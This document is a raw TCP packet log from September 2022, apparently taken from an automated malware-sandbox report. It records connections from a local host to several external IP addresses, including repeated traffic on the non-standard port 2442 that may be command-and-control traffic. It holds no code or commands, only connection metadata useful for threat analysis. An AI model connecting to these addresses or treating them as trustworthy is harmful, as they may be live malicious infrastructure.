                                                              Sep 16, 2022 17:08:31.073312998 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073360920 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073374033 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073414087 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073415041 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073465109 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073467016 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073518991 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073523998 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073575974 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073579073 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073630095 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073631048 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073683023 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073683023 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073735952 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073735952 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073788881 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073788881 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073843002 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073843002 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073894024 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073894978 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073947906 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073947906 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074001074 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074002028 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074054003 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074054956 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074104071 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074105978 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074157953 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074160099 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074209929 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074212074 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074263096 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074264050 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074312925 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074316025 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074368954 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074368954 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074419975 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074419975 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074471951 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074474096 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074527979 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074528933 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074579954 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074580908 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074634075 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074635029 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074687958 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074691057 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074742079 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074743032 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074794054 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074795961 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074846029 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074846029 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074896097 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074898005 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074949980 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.074951887 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.074999094 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.075001955 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.075053930 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.075054884 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.075102091 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.075105906 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.075156927 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.136363029 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136442900 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136492968 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136545897 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136595011 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136626005 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.136646986 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136706114 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136745930 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.136756897 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136806965 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136847019 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.136857986 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136899948 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.136910915 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136962891 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.136981010 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137013912 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137057066 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137065887 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137116909 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137167931 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137217999 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137268066 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137317896 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137336016 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137372971 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137423038 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137474060 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137475014 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137526035 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137564898 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137582064 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137619019 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137631893 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137684107 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137696028 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137737036 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137741089 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137789965 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137789965 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137835026 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137844086 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137881994 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137893915 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137931108 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.137949944 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.137980938 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138005018 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138026953 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138057947 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138086081 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138112068 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138132095 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138164997 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138195992 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138217926 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138251066 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138273001 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138302088 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138326883 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138351917 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138381004 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138406038 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138436079 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138464928 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138490915 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138534069 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138545036 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138586998 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138601065 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138638020 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138653040 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138685942 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138708115 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138737917 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138761997 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138786077 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138816118 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138842106 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138870955 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138894081 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138923883 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.138951063 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.138978004 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139005899 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139033079 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139058113 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139086008 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139111042 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139138937 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139169931 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139192104 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139216900 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139244080 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139276028 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139297962 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139323950 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139378071 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.139377117 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.139431953 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.269620895 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.269642115 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.269661903 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.269793987 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.269982100 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:34.689836025 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:08:34.870815039 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:08:34.870976925 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:08:34.884246111 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:08:35.125996113 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:08:35.177318096 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:08:35.183814049 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:08:35.241096020 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:35.364677906 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:08:35.411914110 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:08:35.691862106 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:08:35.717978001 CEST8049726178.237.33.50192.168.2.7
                                                              Sep 16, 2022 17:08:35.718178988 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:08:35.720278978 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:08:35.751432896 CEST8049726178.237.33.50192.168.2.7
                                                              Sep 16, 2022 17:08:35.754065037 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:08:36.081813097 CEST497252442192.168.2.779.134.225.115
                                                              Sep 16, 2022 17:08:36.313360929 CEST24424972579.134.225.115192.168.2.7
                                                              Sep 16, 2022 17:08:36.751408100 CEST8049726178.237.33.50192.168.2.7
                                                              Sep 16, 2022 17:08:36.751477957 CEST4972680192.168.2.7178.237.33.50
                                                              Sep 16, 2022 17:08:49.742444038 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.806727886 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.806971073 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.810384035 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.874512911 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877140045 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877197027 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877216101 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877233982 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877250910 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877259970 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.877317905 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.877357006 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877373934 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877392054 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877408981 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877408981 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.877443075 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.877448082 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.877499104 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.877536058 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.881519079 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.881568909 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.908637047 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.942672014 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942714930 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942734003 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942750931 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942764044 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942776918 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942797899 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942815065 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942841053 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942863941 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942888021 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942909956 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942959070 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942980051 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.942995071 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.943000078 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.943008900 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.943031073 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.943051100 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.943074942 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.943094969 CEST8049727141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.943212986 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.943262100 CEST4972780192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.973702908 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:49.973910093 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:49.980505943 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.045556068 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049272060 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049290895 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049309015 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049355984 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049360037 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049403906 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049439907 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049448013 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049448013 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049478054 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049504995 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049545050 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049560070 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049592972 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049640894 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049659014 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049689054 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.049736023 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.049753904 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117511988 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117542028 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117559910 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117578030 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117592096 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117597103 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117615938 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117625952 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117634058 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117643118 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117664099 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117676973 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117680073 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117697001 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117703915 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117712975 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117728949 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117741108 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117746115 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117763042 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117774963 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117778063 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117794991 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117795944 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117811918 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117827892 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117829084 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117845058 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117861032 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.117861986 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117885113 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.117904902 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.183967113 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184114933 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184228897 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184251070 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184267998 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184284925 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184295893 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184302092 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184319019 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184326887 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184339046 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184389114 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184427977 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184437990 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184454918 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184472084 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184479952 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184490919 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184499979 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184520960 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184544086 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184706926 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184725046 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184741020 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184758902 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184771061 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184777021 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184789896 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184794903 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.184828043 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.184858084 CEST4972880192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:50.185004950 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.185023069 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.185039997 CEST8049728141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:50.185056925 CEST8049728141.8.192.151192.168.2.7
